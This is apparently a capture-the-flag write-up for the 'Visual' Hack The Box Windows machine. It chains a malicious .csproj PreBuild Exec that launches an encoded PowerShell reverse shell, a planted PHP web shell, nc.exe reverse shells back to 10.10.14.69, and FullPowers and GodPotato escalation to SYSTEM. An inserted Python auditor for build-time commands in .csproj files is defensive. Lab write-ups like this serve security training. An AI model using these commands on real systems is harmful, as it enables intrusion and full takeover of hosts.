
Visual

Windows machine

Foothold

Do not forget to update the /etc/hosts file.

Nmap scan:

nmap -p- -sV -v -Pn visual.htb

User

Go to http://visual.htb -> the server will clone any C# (.NET 6) project from a git URL and compile it for you.

We will exploit the .csproj file using a PreBuild target whose Exec task runs a command before compilation starts:

<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
  <Exec Command="powershell -E <base64>" />
</Target>

Use powercat to generate payload (reverse shell):

powercat -c <lhost> -p 8001 -e cmd.exe -ge > encodedreverseshell.ps1

Replace the <base64> placeholder in the Exec command with the contents of the encodedreverseshell.ps1 file.
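The PreBuild target above is exactly what a build service that compiles untrusted projects has to catch before it ever invokes MSBuild. As an added example (not part of the original write-up, and not the target application's code), here is a Python check that parses a .csproj and flags build-time command execution: Exec tasks inside any Target, the legacy PreBuildEvent/PostBuildEvent properties, and UsingTask declarations with an inline-code task factory. It handles both SDK-style projects (no XML namespace, as in .NET 6) and legacy projects with the MSBuild 2003 namespace. The sample project files are constructed for this example, and the lists of dangerous elements are an assumed policy, not an exhaustive one.

```python
"""Audit a .csproj for build-time command execution before compiling it.

Added example, not from the original write-up. A service that builds
arbitrary projects from git should refuse project files whose targets or
properties run commands; the PreBuild/Exec pattern is the obvious case.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Assumed policy: elements that execute commands or arbitrary code during a build.
EXEC_TASKS = {"Exec"}                                    # runs a shell command
EVENT_PROPERTIES = {"PreBuildEvent", "PostBuildEvent"}   # legacy command hooks
INLINE_TASK_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}  # inline C# tasks


@dataclass
class Finding:
    kind: str      # "exec-task", "build-event" or "inline-task"
    location: str  # enclosing <Target Name=...>, property name, or task name
    detail: str    # the command, property text or factory that was seen


def _local(tag: str) -> str:
    """Strip an XML namespace ("{ns}Tag" -> "Tag") so legacy and SDK-style projects parse alike."""
    return tag.rsplit("}", 1)[-1]


def audit_csproj(xml_text: str) -> list[Finding]:
    """Return one Finding per element that would execute something at build time."""
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers; build a child -> parent map once.
    parents = {child: parent for parent in root.iter() for child in parent}

    def enclosing_target(elem) -> str:
        while elem is not None:
            if _local(elem.tag) == "Target":
                return elem.get("Name", "(unnamed)")
            elem = parents.get(elem)
        return "(none)"

    findings: list[Finding] = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in EXEC_TASKS:
            findings.append(Finding("exec-task", enclosing_target(elem), elem.get("Command", "")))
        elif name in EVENT_PROPERTIES and (elem.text or "").strip():
            findings.append(Finding("build-event", name, elem.text.strip()))
        elif name == "UsingTask" and elem.get("TaskFactory") in INLINE_TASK_FACTORIES:
            findings.append(Finding("inline-task", elem.get("TaskName", "?"), elem.get("TaskFactory")))
    return findings


def should_reject(xml_text: str) -> bool:
    """Policy decision for the build service: any finding means do not build."""
    return bool(audit_csproj(xml_text))


# Constructed sample 1: SDK-style project using the PreBuild/Exec pattern
# from the write-up (the command is a placeholder, not a real payload).
SDK_STYLE_WITH_EXEC = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -E PLACEHOLDER_BASE64" />
  </Target>
</Project>"""

# Constructed sample 2: legacy namespaced project using a PreBuildEvent property.
LEGACY_WITH_BUILD_EVENT = """<Project ToolsVersion="15.0"
         xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>echo constructed-example</PreBuildEvent>
  </PropertyGroup>
</Project>"""

# Constructed sample 3: a clean project that only declares what to compile.
CLEAN_PROJECT = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
</Project>"""

if __name__ == "__main__":
    for label, text in [("sdk+exec", SDK_STYLE_WITH_EXEC),
                        ("legacy+event", LEGACY_WITH_BUILD_EVENT),
                        ("clean", CLEAN_PROJECT)]:
        print(label, "REJECT" if should_reject(text) else "ok", audit_csproj(text))
```

Running the module prints a verdict and the findings for each constructed project; the first two are rejected, the clean one builds. A real build service would apply this to every project file and imported .props/.targets file in the cloned tree, not just the top-level .csproj.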

We have to host our own git server instance (the target can't reach the internet). We will use gogs:

docker pull gogs/gogs
mkdir -p /var/gogs
docker run --name=gogs -p 10022:22 -p 10880:3000 -v /var/gogs:/data gogs/gogs

Go to localhost:10880 and set up the git server instance.
Create a new user.
Push the project to the git instance.

Start a netcat listener:

nc -lnvp 8001

Copy the repository URL into the visual.htb app and let it build the project; once the PreBuild target runs, you should get a reverse shell.

The build is configured to run under the user, not www-data, so we get user privileges right away.

We get the user flag from C:\Users\<user>\Desktop\user.txt:

cat C:/Users/<user>/Desktop/user.txt

Root

Switch to powershell:

powershell

Get tasklist:

tasklist /v

Now to get root we have to think about how -> Apache is running under root -> the server is run using XAMPP.

cd C:/xampp

The Apache root folder is under C:/xampp/htdocs:

cd htdocs

We place a p0wny-shell here, serving it with a Python HTTP server on the attacker machine and fetching it with curl on the victim:

python3 -m http.server  # attacker
curl http://10.10.14.69:8000/shell.php -o shell.php  # victim

Go to the shell page, http://visual.htb/shell.php (or wherever you placed the file).

To get a better shell, use the PHP shell to curl an nc.exe from the attacker machine (it is located at /usr/share/windows-resources/binaries/nc.exe):

curl http://10.10.14.69:8000/nc.exe -o nc.exe  # victim

Start a netcat listener at attacker:

nc -lnvp 8002

Start netcat on the victim:

nc.exe 10.10.14.69 8002 -e cmd.exe

Now that we have a working shell, we can switch to PowerShell again:

powershell

Check who we are (use /priv for privileges only):

whoami /all

Now we are nt authority\local service. We have to do a local privesc to get more privileges.

Use FullPowers to recover the service account's default privileges.
Download the binary from the releases page, serve it with the Python HTTP server, and download it to the victim:

curl http://10.10.14.69:8000/FullPowers.exe -o FullPowers.exe
./FullPowers.exe

Check privileges:

whoami /priv

We now see both of these enabled:
SeAssignPrimaryTokenPrivilege -> Enabled
SeImpersonatePrivilege -> Enabled

To exploit this, we can use one of the Potato tools.
In this case we use GodPotato.

Again, serve the files with the Python HTTP server and download GodPotato to the victim; we will also download and reuse nc.exe:

Tip

The *C:\Users\Public* path is writable by anyone I guess

curl http://10.10.14.69:8000/GodPotato-NET4.exe -o GodPotato-NET4.exe
curl http://10.10.14.69:8000/nc.exe -o nc.exe

Run a netcat listener on the attacker:

nc -lnvp 8003

Spawn a new shell through GodPotato with Administrator privileges (pointing nc.exe at the new listener):

.\GodPotato-NET4.exe -cmd "C:\Users\Public\Downloads\nc.exe 10.10.14.69 8003 -e cmd.exe"

Check privileges and account:

whoami /all

We are nt authority\system.

Get the root flag:

cat C:/Users/Administrator/Desktop/root.txt

or, from cmd.exe in that directory:

type root.txt

Written by Jiri Raja - 08-10-2025